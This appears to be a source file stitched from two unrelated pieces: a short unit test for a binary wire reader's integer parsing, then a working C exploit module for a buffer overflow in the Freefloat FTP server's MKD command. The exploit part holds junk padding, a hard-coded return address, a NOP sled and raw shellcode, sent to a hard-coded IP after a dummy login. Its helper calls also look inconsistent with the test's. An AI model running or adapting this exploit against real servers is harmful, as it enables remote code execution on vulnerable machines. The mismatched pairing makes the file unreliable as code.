TEST(wire_reader_t, ints) {
auto buff = make_buff(unhexify("7FFF"));
wire_reader_t reader(buff.get());
ASSERT_EQ(127, reader.int8());
ASSERT_EQ(-1, reader.int8());
buff = make_buff(unhexify("AAFF"));
reader = wire_reader_t(buff.get());
ASSERT_EQ((int16_t)0xAAFF, reader.int16());
buff = make_buff(unhexify("ABCD0123"));
reader = wire_reader_t(buff.get());
ASSERT_EQ((int32_t)0xABCD0123, reader.int32());
buff = make_buff(unhexify("0123456789ABCDEF"));
reader = wire_reader_t(buff.get());
ASSERT_EQ(0x0123456789ABCDEF, reader.int64());
}
void *freefloat_ftp_server_mkd_exploit(struct module_t *module)
{
struct module_t *self;
int sock_fd;
char buffer[1024];
char attack_string[1006];
char *sc;
int space;
int offset;
char *junk;
char *nops;
offset = 0;
space = 0;
self = module;
print_error("self.offset = %d", self->target.offset);
memset(&buffer, 0, 1024);
/* Hard coded until i get a good options method setup */
sock_fd = tcp_socket_connect("10.69.69.208", "21", buffer, 1024);
memset(&attack_string, '\x90', 1006);
sc =
"\xba\x46\x14\xf5\x8a\xda\xc8\xd9\x74\x24\xf4\x5e\x2b\xc9"
"\xb1\x33\x83\xee\xfc\x31\x56\x0e\x03\x10\x1a\x17\x7f\x60"
"\xca\x5e\x80\x98\x0b\x01\x08\x7d\x3a\x13\x6e\xf6\x6f\xa3"
"\xe4\x5a\x9c\x48\xa8\x4e\x17\x3c\x65\x61\x90\x8b\x53\x4c"
"\x21\x3a\x5c\x02\xe1\x5c\x20\x58\x36\xbf\x19\x93\x4b\xbe"
"\x5e\xc9\xa4\x92\x37\x86\x17\x03\x33\xda\xab\x22\x93\x51"
"\x93\x5c\x96\xa5\x60\xd7\x99\xf5\xd9\x6c\xd1\xed\x52\x2a"
"\xc2\x0c\xb6\x28\x3e\x47\xb3\x9b\xb4\x56\x15\xd2\x35\x69"
"\x59\xb9\x0b\x46\x54\xc3\x4c\x60\x87\xb6\xa6\x93\x3a\xc1"
"\x7c\xee\xe0\x44\x61\x48\x62\xfe\x41\x69\xa7\x99\x02\x65"
"\x0c\xed\x4d\x69\x93\x22\xe6\x95\x18\xc5\x29\x1c\x5a\xe2"
"\xed\x45\x38\x8b\xb4\x23\xef\xb4\xa7\x8b\x50\x11\xa3\x39"
"\x84\x23\xee\x57\x5b\xa1\x94\x1e\x5b\xb9\x96\x30\x34\x88"
"\x1d\xdf\x43\x15\xf4\xa4\xbc\x5f\x55\x8c\x54\x06\x0f\x8d"
"\x38\xb9\xe5\xd1\x44\x3a\x0c\xa9\xb2\x22\x65\xac\xff\xe4"
"\x95\xdc\x90\x80\x99\x73\x90\x80\xf9\x12\x02\x48\xd0\xb1"
"\xa2\xeb\x2c";
/* Total size - addrlen - offset - payload_len - 'MKD ' - 2 for \r\n*/
space = (1006 - 4 - 247 - strlen(sc) - 4 - 2);
junk = make_buff('A', 247);
nops = make_buff('\x90', space);
memcat(attack_string, 1006, &offset, "MKD ", 4);
memcat(attack_string, 1006, &offset, junk, 247);
memcat(attack_string, 1006, &offset, "\xEF\x31\x9D\x7C", 4);
memcat(attack_string, 1006, &offset, nops, space);
memcat(attack_string, 1006, &offset, sc, strlen(sc));
memcat(attack_string, 1006, &offset, "\r\n", 2);
tcp_send_recv(sock_fd, "USER wtf\r\n", 11, buffer, 1024);
tcp_send_recv(sock_fd, "PASS wtf\r\n", 11, buffer, 1024);
tcp_send_recv(sock_fd, attack_string, 1006, buffer, 1024);
free(junk);
free(nops);
return 0;
}
